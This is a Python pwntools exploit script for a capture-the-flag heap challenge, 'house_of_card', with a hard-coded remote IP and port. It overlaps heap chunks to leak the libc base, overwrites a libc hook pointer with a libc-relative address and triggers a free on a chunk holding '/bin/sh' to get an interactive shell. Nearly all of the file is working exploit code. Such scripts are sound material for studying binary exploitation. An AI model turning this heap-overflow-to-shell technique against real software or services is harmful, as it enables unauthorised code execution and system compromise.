  1. #!/usr/bin/env python
  2. from pwn import *
  3.  
# Terminal pwntools uses when gdb.debug()/gdb.attach() below open a debugger pane.
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window

# libc = ELF('./libc.so')
# Target binary loaded from the working directory; the pwntools context
# (arch) is taken from it rather than hard-coded.
elf = ELF('./house_of_card')
context(os='linux', arch=elf.arch)

# Endpoints chosen by the command-line option parsed below ('r' remote, 'l' local).
RHOST = "178.128.87.12"
RPORT = 31336
LHOST = "127.0.0.1"
LPORT = 31336
  15.  
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of ELF section ``name``.

    ``elf`` defaults to the module-level target binary loaded above, bound at
    definition time.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
  18.  
def dbg(ss):
    """Log the value of the expression string ``ss`` as hex, e.g. ``dbg('libc_base')``.

    ``ss`` is passed to eval() in this function's scope (module globals
    visible), so it must only ever be a literal written in this script --
    never text read from the target or the network.
    """
    value = eval(ss)
    log.info("%s: 0x%x" % (ss, value))
  21.  
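conn = None
# First CLI argument selects how to reach the target: 'r' remote endpoint,
# 'l' local listener, 'd' run under gdb, 'a' run locally then attach gdb,
# anything else (or no argument) a plain local process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
# Tuple membership, not `opt in 'rl'`: that was a substring test, so an empty
# argument or 'rl' passed the check and then raised KeyError on the lookup.
if opt in ('r', 'l'):
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # The script has no '{}' placeholder, so the formatted main/entry address
    # is computed but never inserted; gdb just continues.
    gdbscript = """

continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols else elf.entrypoint))
    conn = gdb.debug(['./house_of_card'], gdbscript=gdbscript)
else:
    conn = process(['./house_of_card'])
    # conn = process(['./house_of_card'], env={'LD_PRELOAD': './libc.so'})
    if opt == 'a':
        gdb.attach(conn)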
  36.  
def add(name, size, desc):
    """Drive menu option 1 (add) on the target: name, length, then description.

    ``name`` and ``desc`` are sent raw with sendafter() (the caller supplies
    any trailing newline); ``size`` is sent as a decimal line.
    """
    c = conn
    c.sendlineafter('4. Quit', '1')
    c.sendafter('Name :', name)
    c.sendlineafter('Len?', str(size))
    c.sendafter('Description:', desc)
  42.  
def edit(idx, name, size, desc):
    """Drive menu option 2 (edit) on entry ``idx``: new name, length, description.

    Unlike add(), the description goes out with a plain send() and no prompt
    wait, immediately after the length line.
    """
    c = conn
    c.sendlineafter('4. Quit', '2')
    c.sendlineafter('Back.', str(idx))
    c.sendafter('name?', name)
    c.sendlineafter('Len?', str(size))
    c.send(desc)
  49.  
def delete(idx):
    """Drive menu option 3 (delete) on entry ``idx``."""
    c = conn
    c.sendlineafter('4. Quit', '3')
    c.sendlineafter('Back.', str(idx))
  53.  
# exploit
# Interaction sequence as published. The constant subtracted from the leak and
# the two libc-relative addresses further down are hard-coded for whatever libc
# the target loads (cf. the commented-out libc = ELF('./libc.so') above); they
# are not derived at runtime, so they hold only for that exact build.
log.info('Pwning')

# overlap chunks for addless leak
add('hogehoge\n', 0x80, 'y'*0x10+'\n')
add('fugafuga\n', 0x80, 'y'*0x10+'\n')
add('piyopiyo\n', 0x80, 'y'*0x10+'\n')
add('bohebohe\n', 0x80, 'y'*0x10+'\n')
edit(1, 'hogehoge'*2+'\n', 0x80+0x80, 'ffffff\n')
edit(1, '/bin/sh\x00\n', 0x80+0x81, 'f'*0xf4 + p64(0xdeadbeef)*4 + p64(0xd0*2+1)+'\n')
delete(2)
add('fugafuga\n', 0xd0-8, 'y'*0x10+'\n')
conn.sendlineafter('4. Quit', '2')
conn.recvuntil('[2] Name : ')
# Six received bytes are zero-padded to a 64-bit value; the str concatenation
# onto recv() output suggests this script presumably targets Python 2.
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c1c18
dbg('libc_base')
conn.sendline('5')

# overwrite __free_note
add('bohebohe\n', 0x80, 'a'*0x10+'\n')
edit(5, 'bohebohe\n', 0x81, 'a'*0x8c +p64(libc_base+0x3c3788)+'\n')
edit(5, p64(libc_base + 0x456a0) +'\n', 0x80, 'hgoe\n')
delete(1)
conn.interactive()